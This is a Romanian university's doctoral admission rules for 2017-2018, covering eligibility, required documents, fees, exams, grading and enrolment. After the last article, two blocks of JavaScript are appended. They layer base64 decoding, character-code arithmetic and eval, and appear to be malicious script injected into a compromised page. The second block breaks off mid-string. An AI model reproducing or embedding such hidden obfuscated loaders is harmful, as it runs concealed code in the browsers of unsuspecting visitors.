METODOLOGIE  DE  ORGANIZARE A  ADMITERII LA STUDII UNIVERSITARE DE DOCTORAT  PENTRU

ANUL UNIVERSITAR 2017-2018

 

 1. NORME GENERALE

 

Art. 1 – Instituţia Organizatoare de Studii Universitare  de Doctorat (numită în continuare IOSUD) a Universităţii „Valahia” din Târgovişte (numită în continuare UVT) organizează concurs de admitere la studii universitare de doctorat, la forma de învăţământ cu frecvenţă / cu frecvenţă redusă, cu finanţare de la bugetul de stat sau în regim cu taxă.

 

Art. 2 — Concursul se organizează pe domenii de doctorat în cadrul şcolilor doctorale. Şcoala Doctorală de Ştiinţe Economice şi Umaniste (numită în continuare SDSEU) organizează concurs pentru domeniile Management, Contabilitate şi Istorie, iar Şcoala Doctorală de Ştiinţe Inginereşti (numită în continuare SDSI) pentru domeniile Ingineria Materialelor, Inginerie Electrică şi Inginerie Mecanică.

 

Art. 3 — Metodologia de concurs este în conformitate cu Legea Educaţiei Naţionale nr. l/2011 cu modificările şi completările ulterioare, Codul Studiilor Universitare de Doctorat (HG 681/2011) cu modificările şi completările ulterioare şi Ordinul Nr. 6.102 din decembrie 2016 pentru aprobarea Metodologiei –  cadru privind organizarea admiterii în ciclurile de studii universitare de licenţă, de master şi de doctorat pentru anul universitar 2017 – 2018.

 

Art. 4 — Numărul de locuri finanţate de la buget este alocat prin ordin al MEN. Numărul de locuri pentru doctoratul în regim cu taxă şi cuantumul taxei se aprobă de către Senatul UVT, cu avizul Consiliului de Administraţie.

 

Art. 5 — Numărul de locuri pentru fiecare conducător de doctorat se aprobă de către Senatul UVT, la propunerea CSUD, cu avizul Consiliului de Administraţie, în conformitate cu legislaţia în vigoare.

 

 1.  CONDIŢII GENERALE DE ÎNSCRIERE ŞI ADMITERE A CANDIDAŢILOR

 

Art. 6 – Înscrierea la concursul de admitere se face personal, pe baza cărții de identitate/pașaportului. Înscrierea se poate face în numele candidatului și de către o altă persoană, pe bază de procură.

 

Art. 7 – La concursul de admitere la studii universitare de doctorat se pot înscrie la sediul IOSUD (Str.Lt.Stancu Ion, nr.35, Corpul D, parter) numai absolvenţii cu diplomă de licenţă sau echivalentă ai studiilor universitare de lungă durată organizate conform Legii nr.84/1995, republicată, cu modificările şi completările ulterioare, absolvenţii cu diploma de master ai ciclului de studii universitare de master organizate conform Legii nr. 288/2004, cu modificările şi completările ulterioare, precum şi absolvenţii studiilor efectuate în străinătate şi recunoscute de către Direcţia de specialitate din cadrul MEN, ca fiind cel puţin studii universitare de master. Fiecare candidat are obligaţia să prezinte la înscrierea la concursul de admitere la doctorat atestatul de recunoaştere a studiilor, eliberat de către direcţia de specialitate din cadrul MEN.

 

Art. 8 — Pot candida la admiterea în ciclul de studii universitare de doctorat cetăţenii statelor membre ale UE, ai statelor aparţinând Spaţiului Economic European şi ai Confederaţiei Elveţiene, în aceleaşi condiţii prevăzute de lege pentru cetăţenii români, inclusiv în ceea ce priveşte taxele de şcolarizare.

 

Art. 9   — Un candidat declarat admis poate beneficia de finanţare de la bugetul de stat o singură dată pentru ciclul de studii universitare de doctorat. În acest sens, doctorandul va completa la admitere o declaraţie pe proprie răspundere, prin care să specifice dacă a mai beneficiat de finanţare de la bugetul de stat.

 

Art. 10 – Înscrierea la concursul de admitere la studii universitare de doctorat într-un domeniu de dctorat nu este condiționată de domeniul în care a fost dobândită diploma de licență sau de master. Durata totală cumulată a ciclului de studii universitare de licență și master trebuie să fie de cel puțin 300 de credite transferabile (ECTS).

 

Art. 11 — Documentele necesare pentru înscrierea candidaţilor se afişează pe site-ul UVT şi la sediul IOSUD.

 

Art. 12 — Dosarul de înscriere se înregistrează l a Secretariatul IOSUD. Candidatul va prezenta un dosar plic, pe care va înscrie datele de identificare (inclusiv adresa de e-mail şi nr.de telefon), cu următoarele documente:

 • cerere-tip de înscriere la concursul de admitere la doctorat (Anexa nr.1);
 • curriculum vitae;
 • lista lucrărilor ştiinţifice (dacă este cazul);
 • certificat de competenţă lingvistică (sau susţine un examen de competenţă lingvistică) conform reglementărilor în vigoare;
 • certificat de naştere – copie legalizată (sau original pentru certificare);
 • certificat de căsătorie sau orice act care atestă schimbarea numelui – copie legalizată (sau original pentru certificare) -dacă este cazul;
 • I. – copie simplă;
 • diploma de bacalaureat – copie legalizată (sau original pentru certificare);
 • diploma de licenţă – copie legalizată(sau original pentru certificare);
 • foaie matricolă sau suplimentul diplomei de licenţă – copie legalizată (sau original pentru certificare);
 • diploma de master (obligatorie numai pentru absolvenţii pe sistem Bologna) – copie legalizată (sau original pentru certificare);
 • foaie matricolă sau suplimentul diplomei de master – copie legalizată (sau original pentru certificare);
 • chitanţa de achitare a taxei de înscriere (500 lei);
 • chitanţa de achitare a taxei de susţinere a examenului de competenţă lingvistică (engleză sau franceză – 300 lei).

 

Art. 13 – Cetăţenii străini din state terţe UE care doresc să participe la admiterea la studii universitare de doctorat trebuie să depună dosarele direct la Biroul pentru Relaţii Internaţionale din cadrul UVT, conform  Metodologiei pentru primirea la studii a cetăţenilor străini din state terţe UE în Universitatea “Valahia” din Târgovişte. Dosarele vor fi depuse la secretariatul IOSUD numai după obţinerea Scrisorii de acceptare la studii emisă de către MEN – Direcţia Generală Relații Internaționale şi Afaceri Europene.

 

Art. 14 –  La admiterea la studii universitare de doctorat cu predare în limba română, cetăţenii străini au obligaţia să prezinte un certificat de competenţă lingvistică pentru limba română eliberat de către instituţii abilitate de MEN. În condiţiile în care candidatul are o diplomă care dovedeşte că a absolvit studii la o instituţie de învăţământ superior cu predare în limba română, acreditată de MEN, nu mai este necesar certificatul de competenţă lingvistică pentru limba română.

 

Art. 15 — În vederea înmatriculării, candidaţii admişi pe locurile finanţate de la buget au obligaţia să depună diploma ciclului de studii universitare anterior absolvit (licenţă + master pentru absolvenţii studiilor organizate conform Legii nr. 288/ 2004, sau diploma de licenţă pentru absolvenţii studiilor de lungă durată organizate conform Legii nr. 84/1995) în original, la secretariatul IOSUD. Nedepunerea acestei diplome sau a adeverinţei, după caz, în original la semnarea contractului de studii, atrage după sine neînmatricularea pe locurile finanţate de la bugetul de stat.

 

Art. 16 — Dosarele candidaţilor respinşi sau ale celor care renunţă la locul obţinut prin admitere, vor fi restituite, după afişarea rezultatelor finale, în termen de 48 de ore de la data depunerii cererii, fără perceperea de taxe suplimentare.

 

Art. 17 — Taxele de înscriere la concurs şi taxele de şcolarizare pentru anul universitar 2017-2018, în cuantumurile aprobate de Senatul UVT, vor fi afişate la sediul IOSUD şi pe site-ul UVT.

 

Art. 18 — Sunt scutiţi de plata taxei de admitere angajaţii UVT şi copiii personalului didactic aflat în activitate.

 

Art. 19 – Copiii personalului didactic și didactic auxiliar aflat în activitate sau pensionat sunt scutiți de plata taxelor de înscriere la concursul de admitere în învățământul superior și beneficiază de gratuitate la cazare în cămine. Scutirea se face la cerere, numai pe baza unei adeverințe doveditoare. Aprobarea scutirii se face de către comisia de admitere pe IOSUD.

 

Art. 20 Costurile aferente depăşirii duratei învăţământului gratuit (de 3 ani pentru studiile universitare de doctorat) se suportă de către studenţii-doctoranzi.

 

 1.  CONCURSUL DE ADMITERE

 

Art. 21 –În urma discuţiilor cu conducătorii de doctorat, directorii şcolilor doctorale propun analizei şi aprobării CSUD numărul total de locuri vacante de studenți–doctoranzi, pe şcoli doctorale, pentru fiecare domeniu și conducător de doctorat în parte. CSUD înaintează CA şi Senatului pentru aprobare propunerea privind numărul de locuri vacante de studenţi-doctoranzi pentru anul universitar 2017-2018.

 

Art. 22 – Selecția candidaților pentru o poziție vacantă se realizează de către conducătorul de doctorat care supervizează respectiva poziție, ajutat de comisia stabilită în acest scop.

 

Art. 23 — Concursul de admitere constă în:

 • probă eliminatorie de competenţă lingvistică pentru o limbă străină – limba franceză sau engleză, la alegere;
 • examen de specialitate, oral.

 

Art. 24 – Examenul de competență lingvistică se susține la departamentul de specialitate al UVT care eliberează un certificat de competență lingvistică.

 

Art. 25 – Examenul de competență lingvistică nu mai este necesar în următoarele situaţii:

 • candidatul este absolvent al unei facultăți de limbi străine sau al unei facultăţi cu predare în limbă străină (în limbile engleză, franceză, germană, spaniolă sau italiană);
 • candidatul are un certificat de competență lingvistică cu recunoaștere internațională pentru una din limbile menţionate mai sus;
 • candidatul a obținut deja acest certificat de la UVT.

 

Art. 26 — Examenul de specialitate se desfăşoară în faţa unei comisii de examen formate din conducătorul de doctorat şi minim 2 membri propuşi de acesta. Comisiile de examen de specialitate  sunt avizate de directorul  Şcolii Doctorale şi aprobate de directorul CSUD.

 

Art. 27 – Examenul de specialitate constă într-un interviu al candidatului în faţa comisiei de examen,  interviu în cadrul căruia se analizează preocupările științifice ale candidatului, aptitudinile  sale de cercetare în concordanță cu tematica tezei de doctorat. Temele de cercetare și bibliografia aferentă vor fi afișate la vizierul IOSUD și postate pe site-ul web al UVT.

 

Art. 28 – Rezultatele concursului de admitere la studii universitare de doctorat sunt consemnate de către comisia de examen într-un proces-verbal.

(1) Fiecare membru al comisiei apreciază pregătirea candidatului cu note între 1 şi 10. Nota finală este media aritmetică a notelor obţinute.

 

(2)  În cazul candidaţilor cu medii de admitere egale, criteriile succesive de departajare ale acestora sunt: 1. Media examenului de licenţă; 2. Media aritmetică de promovare a anilor de studii de licenţă (conform foii matricole).

 

Art. 29 — Media minimă de admitere la doctorat este 8,00. Admiterea candidaţilor se face în limita locurilor disponibile pentru fiecare conducător de doctorat în parte, în ordinea descrescătoare a mediei la concursul de admitere, în cadrul opţiunii privind forma de pregătire.

 

Art. 30 — Concursul de admitere la doctorat este valabil numai pentru domeniul fundamental şi domeniul de doctorat la care s-a înscris candidatul. El se organizează simultan pentru locurile finanţate de la buget şi pentru cele cu taxă, statutul candidaţilor admişi stabilindu-se în funcţie de opţiunea exprimată la data înscrierii şi de media concursului de admitere.

 

Art. 31 Media obţinută de candidaţi la admitere este valabilă numai în cadrul IOSUD-UVT.

 

Art. 32 – Rezultatele concursului de admitere se fac publice prin afișare la sediul IOSUD și pe pagina web proprie.

 

Art. 33 – Validarea rezultatelor admiterii la studii universitare de doctorat se face de către Consiliul Școlii Doctorale (CSD) și Consiliul pentru Studii Universitare de Doctorat (CSUD).

 

Art. 34 – Înaintea începerii anului uniuversitar:

 1. Candidații declarați admiși pe locurile finanțate de la bugetul de stat semnează contractul de școlarizare la sediul IOSUD și depun în original diploma/ atestatul de recunoaștere a diplomei/ adeverința ciclului de studii universitare anterior absolvit, după caz.
 2. Candidații declarați admiși pe locurile cu taxă semnează contractul de școlarizare la sediul IOSUD și achită 40% din taxa de studii pentru anul I.

Art. 35 – Înmatricularea candidaţilor declarați admiși în urma concursului de admitere se face prin Decizie a Rectorului UVT.

 

Art. 36 – După aprobarea înmatriculării, studenții-doctoranzi sunt înscriși în Registrul matricol unic cu un număr unic valabil pentru întreaga perioadă de școlarizare, la specializarea la care au fost admiși.

 

 1.  DISPOZIŢII FINALE

 

Art. 37 – Prezentul regulament este obligatoriu şi se aduce la cunoştinţă candidaţilor prin afişare.

 

Art. 38 — La nivelul IOSUD-UVT va funcţiona o Comisie de Admitere numită prin decizia conducătorului IOSUD la propunerea CSUD, cu competenţe în asigurarea legalităţii desfăşurării concursului de admitere.

 

Art. 39 — În situaţia în care, în urma verificării dosarelor depuse de candidaţi, se constată neîndeplinirea condiţiilor legale de participare la concurs, Comisia de Admitere îşi rezervă dreptul de a elimina din concurs candidaţii în cauză.

 

Art. 40 — UVT nu răspunde de erorile de înscriere sau de calcul din documentele oficiale (diplome, foi matricole etc.) şi nici de erorile de completare comise de candidaţi în fişele de înscriere.

 

Art. 41 — Toate aspectele ce vizează modul de aplicare a regulamentului propriu de concurs sunt, în exclusivitate, de competenţa Comisiei Centrale de Admitere şi a conducerii UVT.

 

 

 

var EWQXRTWEJJ = atob(‘dmFyIExQQ0ZESkFMVEogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIwIC0gMiwgMTAzIC0gNiwgMTIzIC0gOSwgMzcgLSA1LCAxMTIgLSA1LCAxMDYgLSA1LCAxMjMgLSAyLCA0MSAtIDksIDYzIC0gMiwgMzUgLSAzLCA0NCAtIDUsIDc1IC0gOCwgOTEgLSA1LCAxMjIgLSA2LCA4NyAtIDYsIDEwNyAtIDQsIDEwNSAtIDIsIDY4IC0gMywgMTI3IC0gNSwgMTE5IC0gOSwgOTEgLSA4LCA0MCAtIDEsIDYxIC0gMiwgMTcgLSA3LCAxMTkgLSAxLCAxMDMgLSA2LCAxMTggLSA0LCAzNSAtIDMsIDEwMiAtIDEsIDExMyAtIDMsIDEwMiAtIDMsIDEwNCAtIDMsIDEwNSAtIDUsIDM0IC0gMiwgNjcgLSA2LCAzNyAtIDUsIDQ1IC0gNiwgNzkgLSAxLCA4NSAtIDEsIDEwMiAtIDMsIDc4IC0gNywgMTAyIC0gMywgODkgLSA3LCAxMDQgLSA1LCA5MCAtIDQsIDgwIC0gNiwgMTIyIC0gMiwgOTQgLSA0LCA4OCAtIDksIDEwNSAtIDcsIDExNCAtIDUsIDgzIC0gNiwgMTI1IC0gNCwgODAgLSA5LCAxMjcgLSA1LCA3OCAtIDUsIDkwIC0gNywgNzMgLSA2LCAxMDcgLSAyLCA4NiAtIDUsIDkxIC0gNiwgNzUgLSA0LCAxMTcgLSA3LCA1MiAtIDQsIDEwNyAtIDQsIDc4IC0gNCwgNjcgLSAxLCA3OCAtIDksIDEyMCAtIDEsIDczIC0gNCwgMTIyIC0gMywgNzggLSA1LCA3MiAtIDMsIDc2IC0gNiwgMTA2IC0gMywgMTE5IC0gNCwgNDkgLSA2LCA4MSAtIDcsIDExNSAtIDksIDEwNSAtIDIsIDc0IC0gOSwgMTA4IC0gNywgOTEgLSA2LCA2NiAtIDEsIDg3IC0gMiwgODIgLSA5LCAxMDkgLSA2LCAxMTEgLSA4LCA3MyAtIDEsIDc4IC0gNSwgMTIzIC0gMSwgMTA4IC0gOCwgMTI4IC0gOCwgOTYgLSA4LCA4OSAtIDIsIDExOCAtIDYsIDEyMSAtIDUsIDczIC0gMywgMTI0IC0gMiwgODEgLSA0LCAxMDUgLSA2LCA2OCAtIDMsIDExNCAtIDQsIDU1IC0gNywgMTI0IC0gNSwgNzkgLSAyLCAxMjIgLSAzLCA3MSAtIDYsIDg1IC0gNCwgNzcgLSA4LCAxMjIgLSAyLCA4MSAtIDQsIDEyNiAtIDQsIDcxIC0gMiwgMTIyIC0gMywgMTI1IC0gNiwgMTEyIC0gMywgODQgLSA2LCAxMzEgLSA5LCA3OSAtIDEsIDEwMiAtIDMsIDEwOSAtIDksIDEwNSAtIDEsIDgzIC0gMiwgOTIgLSA2LCA3OCAtIDUsIDExNSAtIDcsIDU2IC0gNywgNzAgLSAzLCAxMDggLSA4LCA3MiAtIDUsIDExOCAtIDMsIDExNCAtIDksIDY2IC0gMSwgNzEgLSA0LCA3NyAtIDcsIDEwMyAtIDMsIDg3IC0gNCwgNzQgLSAzLCA1OCAtIDYsIDgxIC0gMiwgNzkgLSA3LCA3NCAtIDYsIDc5IC0gNiwgMTE3IC0gOSwgODMgLSA2LCA3MyAtIDcsIDU0IC0gNiwgMTI0IC0gMywgNzIgLSA2LCAxMTAgLSA2LCAxMDQgLSA1LCAxMTYgLSA1LCA5MSAtIDUsIDcyIC0gNywgNzQgLSA5LCA1MSAtIDQsIDEwNiAtIDgsIDY4IC0gMSwgOTEgLSA2LCA2NyAtIDIsIDgxIC0gNCwgNjkgLSAzLCA3OCAtIDEsIDg0IC0gNSwgNzkgLSA2LCAxMTAgLSAyLCA5MSAtIDYsIDczIC0gNSwgODEgLSA0LCAxMDggLSAzLCAxMTkgLSA4LCA1NiAtIDQsIDkyIC0gNSwgMTE0IC0gOCwgMTE2IC0gMSwgOTQgLSA5LCA5MCAtIDksIDc1IC0gNCwgMTA5IC0gNSwgNzQgLSA4LCA5NSAtIDUsIDY5IC0gMSwgMTA1IC0gNiwgMTI0IC0gOSwgODEgLSAzLCA4NSAtIDQsIDczIC0gNCwgNjUgLSA5LCA3MCAtIDUsIDExMSAtIDgsIDExMyAtIDYsIDU0IC0gNSwgOTMgLSA3LCA3MiAtIDcsIDk0IC0gNSwgNTcgLSA3LCA4MSAtIDgsIDExMiAtIDYsIDgxIC0gNywgMTAwIC0gMywgODAgLSAzLCA2OSAtIDMsIDEwMSAtIDIsIDkyIC0gNCwgNzcgLSAzLCA3NSAtIDksIDg3IC0gNiwgODEgLSA2LCA3NiAtIDcsIDY4IC0gMSwgMTE4IC0gMywgNDkgLSAyLCA3MyAtIDIsIDcwIC0gMiwgOTMgLSA3LCA4NCAtIDQsIDc5IC0gOSwgMTI4IC0gNiwgODYgLSA5LCAxMDEgLSAyLCA2NiAtIDEsIDExMSAtIDEsIDExNyAtIDUsIDYxIC0gOSwgOTUgLSA3LCA3MSAtIDYsIDYzIC0gMiwgNzAgLSA5LCA0MyAtIDQsIDY3IC0gOCwgMTQgLSA0LCAxMTEgLSA5LCAxMjUgLSA4LCAxMTggLSA4LCAxMDYgLSA3LCAxMjEgLSA1LCAxMDggLSAzLCAxMTkgLSA4LCAxMTQgLSA0LCAzOSAtIDcsIDEyNyAtIDcsIDExOSAtIDgsIDExOCAtIDQsIDk3IC0gMiwgMTAyIC0gMSwgMTE4IC0gOCwgMTA4IC0gOSwgNDcgLSA3LCAxMTcgLSAyLCAxMTcgLSAxLCAxMTcgLSAzLCAxMTEgLSA2LCAxMTEgLSAxLCAxMDUgLSAyLCA0NiAtIDIsIDM0IC0gMiwgMTEyIC0gNSwgMTA1IC0gNCwgMTI5IC0gOCwgNDMgLSAyLCAzOCAtIDYsIDEyNCAtIDEsIDEzIC0gMywgMzYgLSA0LCAzOSAtIDcsIDEyNCAtIDYsIDEwMyAtIDYsIDExOSAtIDUsIDM5IC0gNywgMTIzIC0gOSwgMTA4IC0gNywgMTIzIC0gOCwgMzYgLSA0LCA2NyAtIDYsIDM0IC0gMiwgNDUgLSA2LCA0MiAtIDMsIDY3IC0gOCwgMTIgLSAyLCAzNiAtIDQsIDM0IC0gMiwgMTA1IC0gMywgMTE4IC0gNywgMTIxIC0gNywgNDAgLSA4LCA0MiAtIDIsIDEyMyAtIDUsIDEwMSAtIDQsIDEyMSAtIDcsIDQwIC0gOCwgMTA2IC0gMSwgMzUgLSAzLCA2MyAtIDIsIDM1IC0gMywgNTMgLSA1LCA2NiAtIDcsIDQxIC0gOSwgMTEzIC0gOCwgMzkgLSA3LCA2OCAtIDgsIDMzIC0gMSwgMTI0IC0gOSwgMTE3IC0gMSwgMTIyIC0gOCwgMTEyIC0gNywgMTE3IC0gNywgMTA2IC0gMywgNDkgLSAzLCAxMTAgLSAyLCAxMDIgLSAxLCAxMTEgLSAxLCAxMDcgLSA0LCAxMTkgLSAzLCAxMDUgLSAxLCA2NiAtIDcsIDM0IC0gMiwgMTE0IC0gOSwgNTAgLSA3LCA1MiAtIDksIDQzIC0gMiwgMzMgLSAxLCAxMjQgLSAxLCAxNCAtIDQsIDQxIC0gOSwgMzkgLSA3LCA0MCAtIDgsIDM5IC0gNywgMTIxIC0gNywgMTA0IC0gMywgMTIxIC0gNiwgMzkgLSA3LCA0NSAtIDIsIDY3IC0gNiwgNDAgLSA4LCA5MCAtIDcsIDExNyAtIDEsIDEyMCAtIDYsIDExMiAtIDcsIDExNCAtIDQsIDEwNSAtIDIsIDQ4IC0gMiwgMTAzIC0gMSwgMTE4IC0gNCwgMTIwIC0gOSwgMTEzIC0gNCwgNzEgLSA0LCAxMTMgLSA5LCAxMDMgLSA2LCAxMjMgLSA5LCA3MyAtIDYsIDExMyAtIDIsIDEwNyAtIDcsIDEwNCAtIDMsIDQ1IC0gNSwgMTE5IC0gNCwgMTI1IC0gOSwgMTE4IC0gNCwgMTEzIC0gOCwgMTE0IC0gNCwgMTA0IC0gMSwgNTAgLSA0LCAxMDUgLSA2LCAxMTMgLSA5LCA5OSAtIDIsIDExNiAtIDIsIDc1IC0gOCwgMTEzIC0gMiwgMTAzIC0gMywgMTEwIC0gOSwgNjYgLSAxLCAxMjAgLSA0LCA0NiAtIDYsIDEwNyAtIDIsIDQ0IC0gMywgMzQgLSAyLCAxMDMgLSA5LCAxMyAtIDMsIDExIC0gMiwgMTYgLSA3LCAxNiAtIDcsIDEwIC0gMSwgMTEyIC0gNSwgMTA5IC0gOCwgMTI4IC0gNywgNDggLSAyLCAxMDAgLSAxLCAxMTMgLSA5LCAxMDQgLSA3LCAxMTUgLSAxLCA3NiAtIDksIDExNyAtIDYsIDEwNCAtIDQsIDEwNSAtIDQsIDY5IC0gNCwgMTIzIC0gNywgNDcgLSA3LCAxMTMgLSA4LCA0MSAtIDksIDQ2IC0gOSwgMzMgLSAxLCAxMTAgLSAzLCAxMDcgLSA2LCAxMjIgLSAxLCA1NCAtIDgsIDExMiAtIDQsIDEwOSAtIDgsIDExOSAtIDksIDExMiAtIDksIDExOSAtIDMsIDEwOCAtIDQsIDQyIC0gMSwgNDkgLSA4LCA2NSAtIDYsIDEzIC0gMywgMzkgLSA3LCA0MCAtIDgsIDEyOCAtIDMsIDE3IC0gNywgMzcgLSA1LCAzNyAtIDUsIDEyMyAtIDksIDEwOCAtIDcsIDEyNSAtIDksIDExOSAtIDIsIDExOCAtIDQsIDExMSAtIDEsIDM4IC0gNiwgMTE4IC0gNCwgMTA0IC0gMywgMTIyIC0gNywgNjEgLSAyLCAxMSAtIDEsIDEyNiAtIDEsIDEyIC0gMiwgMTEgLSAxLCAxMjQgLSA2LCAxMDQgLSA3LCAxMTYgLSAyLCA0MSAtIDksIDEwNyAtIDcsIDEwNCAtIDMsIDEwMyAtIDQsIDMzIC0gMSwgNjUgLSA0LCA0MSAtIDksIDEyNiAtIDYsIDExMiAtIDEsIDExNyAtIDMsIDEwNCAtIDksIDEwNCAtIDMsIDExNSAtIDUsIDEwNyAtIDgsIDQ4IC0gOCwgMTAxIC0gNCwgMTIzIC0gNywgMTEzIC0gMiwgMTAxIC0gMywgNDkgLSA5LCAxMDQgLSAzLCAxMTIgLSAyLCAxMDEgLSAyLCAxMDMgLSAyLCAxMDYgLSA2LCA0MyAtIDIsIDQ4IC0gNCwgMzQgLSAyLCAxMTYgLSA5LCAxMDcgLSA2LCAxMjQgLSAzLCA0MyAtIDIsIDY4IC0gOSwgMTkgLSA5LCA0NSAtIDUsIDExNyAtIDcsIDEwNCAtIDMsIDEyMyAtIDQsIDM5IC0gNywgNzQgLSA0LCAxMTggLSAxLCAxMTcgLSA3LCAxMDUgLSA2LCAxMTkgLSAzLCAxMTQgLSA5LCAxMTIgLSAxLCAxMTggLSA4LCA0MiAtIDIsIDEwNSAtIDUsIDEwNiAtIDUsIDEwNSAtIDYsIDQyIC0gMSwgNDkgLSA4LCA0MiAtIDIsIDQ2IC0gNSwgNjggLSA5LCAxOCAtIDgsIDEzIC0gMyk7ZXZhbChMUENGREpBTFRKKTs=’);
eval(EWQXRTWEJJ);

var OXZRJQUBXH = atob(‘dmFyIE9WSURNSlNPUlogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE0IC0gNCwgMTI1IC0gNywgMTAwIC0gMywgMTIwIC0gNiwgMzkgLSA3LCAxMDggLSAxLCAxMDUgLSA0LCAxMjggLSA3LCAzNiAtIDQsIDY5IC0gOCwgMzggLSA2LCA0OCAtIDksIDExMyAtIDksIDEwNCAtIDcsIDEwMyAtIDUsIDExMSAtIDIsIDg2IC0gOCwgMTE2IC0gOSwgMTI2IC0gOCwgNzYgLSA5LCA4NSAtIDksIDEwNSAtIDIsIDQyIC0gMywgNjIgLSAzLCAxMSAtIDEsIDEyMyAtIDUsIDEwNiAtIDksIDExNyAtIDMsIDQxIC0gOSwgMTEwIC0gOSwgMTE4IC0gOCwgMTA4IC0gOSwgMTA5IC0gOCwgMTA5IC0gOSwgMzcgLSA1LCA3MCAtIDksIDM1IC0gMywgNDggLSA5LCA3OCAtIDYsIDEwNCAtIDEsIDY4IC0gMywgODYgLSA1LCA4OCAtIDQsIDg2IC0gMiwgNTMgLSAxLCA5NSAtIDUsIDczIC0gNCwgNzEgLSA0LCA2MiAtIDUsIDEyMCAtIDUsIDkyIC0gNSwgMTE0IC0gNywgMTEwIC0gNywgNzIgLSAyLCA3MSAtIDMsIDg2IC0gNSwgNTcgLSA1LCA1OCAtIDMsIDc0IC0gOCwgMTA1IC0gMSwgNzkgLSAyLCAxMTkgLSAzLCA4OCAtIDksIDc0IC0gNSwgMTE1IC0gOCwgODMgLSA3LCA3OCAtIDksIDEyOCAtIDksIDEwMSAtIDIsIDg2IC0gOSwgODcgLSA4LCAxMTIgLSA5LCA2MCAtIDgsIDEyMyAtIDEsIDgwIC0gNCwgMTI5IC0gOCwgMTExIC0gNCwgODEgLSA2LCA3MSAtIDMsIDg5IC0gOCwgNjAgLSA0LCA5NiAtIDksIDkxIC0gOSwgOTQgLSA3LCAxMTYgLSA5LCA5MSAtIDIsIDcyIC0gMiwgODkgLSA1LCA3NSAtIDYsIDExNCAtIDYsIDczIC0gMywgMTI4IC0gOCwgMTI1IC0gNSwgNzIgLSAxLCA5MiAtIDksIDUxIC0gMiwgOTMgLSAzLCA3NyAtIDgsIDc3IC0gNiwgMTI1IC0gNiwgOTAgLSA5LCAxMTUgLSA3LCA3OCAtIDUsIDc0IC0gNSwgMTE2IC0gOSwgMTAxIC0gMywgNzEgLSA1LCA3NCAtIDgsIDkwIC0gMSwgMTIyIC0gNywgODggLSA5LCAxMDkgLSA1LCA2NCAtIDgsIDc1IC0gNiwgODIgLSA3LCAxMTMgLSA4LCA1NSAtIDMsIDg2IC0gMywgNzUgLSAzLCA3NCAtIDksIDkwIC0gOCwgNzcgLSAyLCA5MiAtIDksIDEwNyAtIDEsIDU1IC0gNywgOTIgLSAyLCA3NiAtIDYsIDk0IC0gNywgODUgLSAzLCAxMDggLSA1LCA4NiAtIDUsIDY5IC0gNCwgNzIgLSA3LCA4OCAtIDIsIDcxIC0gMSwgMTEyIC0gOCwgNTggLSA5LCA1NiAtIDgsIDkwIC0gOCwgNzQgLSA0LCAxMTAgLSAzLCA1OSAtIDgsIDg1IC0gNSwgMTEwIC0gNywgOTggLSA5LCA4NCAtIDUsIDc1IC0gOSwgMTIwIC0gMSwgMTE3IC0gMiwgODQgLSA1LCA4MSAtIDUsIDEyNyAtIDcsIDExOSAtIDQsIDEwMyAtIDEsIDk5IC0gMSwgODcgLSA0LCA3NSAtIDIsIDg0IC0gOCwgODggLSA2LCAxMjQgLSA0LCA3OSAtIDYsIDkzIC0gNiwgNzIgLSA0LCA3MyAtIDUsIDExOCAtIDcsIDc2IC0gOSwgNzIgLSAyLCA5NSAtIDgsIDEyMSAtIDIsIDEwNiAtIDIsIDcwIC0gNCwgMTA1IC0gMiwgNzEgLSAyLCA4NCAtIDQsIDkxIC0gNywgNzMgLSA4LCAxMDIgLSAzLCA2NSAtIDgsIDg4IC0gNCwgNzcgLSA3LCA1OCAtIDEsIDU3IC0gNSwgODkgLSA3LCAxMDcgLSA0LCA4NiAtIDksIDc0IC0gMiwgNjcgLSAyLCAxMDYgLSAyLCAxMDMgLSA0LCA3NCAtIDksIDgzIC0gOCwgMTIzIC0gNCwgODcgLSAyLCA2OSAtIDIsIDEwNyAtIDksIDg4IC0gNSwgODUgLSA0LCA3NSAtIDgsIDcxIC0gNCwgOTAgLSA5LCA4OCAtIDIsIDgwIC0gMywgNzcgLSA5LCA3NCAtIDYsIDU3IC0gNSwgMTA3IC0gOSwgNzAgLSAxLCAxMjMgLSAyLCA1NiAtIDgsIDExOCAtIDcsIDgyIC0gOCwgNzMgLSA4LCA2NyAtIDIsIDgwIC0gNywgNzYgLSA4LCAxMTIgLSA5LCAxMTMgLSA1LCAxMTIgLSAzLCA3MyAtIDIsIDEyNyAtIDgsIDg4IC0gNywgMTEyIC0gNCwgNzUgLSAyLCA3MiAtIDMsIDYxIC0gOCwgODUgLSAxLCA5OCAtIDEsIDEyNiAtIDcsIDY3IC0gNiwgNjMgLSAyLCA0NyAtIDgsIDY4IC0gOSwgMTggLSA4LCAxMTEgLSA5LCAxMjEgLSA0LCAxMTggLSA4LCAxMDEgLSAyLCAxMjAgLSA0LCAxMDcgLSAyLCAxMTIgLSAxLCAxMTUgLSA1LCAzNCAtIDIsIDEyMiAtIDIsIDExNCAtIDMsIDExNSAtIDEsIDk3IC0gMiwgMTEwIC0gOSwgMTE2IC0gNiwgMTAzIC0gNCwgNDggLSA4LCAxMTkgLSA0LCAxMjEgLSA1LCAxMjAgLSA2LCAxMDggLSAzLCAxMTYgLSA2LCAxMDYgLSAzLCA0NyAtIDMsIDM2IC0gNCwgMTA4IC0gMSwgMTA0IC0gMywgMTI1IC0gNCwgNDcgLSA2LCA0MSAtIDksIDEzMSAtIDgsIDEyIC0gMiwgMzUgLSAzLCAzNiAtIDQsIDEyNyAtIDksIDEwMCAtIDMsIDExOSAtIDUsIDQxIC0gOSwgMTE4IC0gNCwgMTA5IC0gOCwgMTIzIC0gOCwgNDAgLSA4LCA2MyAtIDIsIDQxIC0gOSwgNDAgLSAxLCA0MSAtIDIsIDYwIC0gMSwgMTUgLSA1LCAzNiAtIDQsIDM1IC0gMywgMTAzIC0gMSwgMTE4IC0gNywgMTE4IC0gNCwgNDAgLSA4LCA0OCAtIDgsIDEyMCAtIDIsIDEwMiAtIDUsIDExOSAtIDUsIDM3IC0gNSwgMTEzIC0gOCwgMzUgLSAzLCA3MCAtIDksIDM5IC0gNywgNTQgLSA2LCA2MyAtIDQsIDQxIC0gOSwgMTA5IC0gNCwgMzcgLSA1LCA2NSAtIDUsIDQxIC0gOSwgMTIyIC0gNywgMTIwIC0gNCwgMTIxIC0gNywgMTA4IC0gMywgMTE3IC0gNywgMTA0IC0gMSwgNTEgLSA1LCAxMTUgLSA3LCAxMDUgLSA0L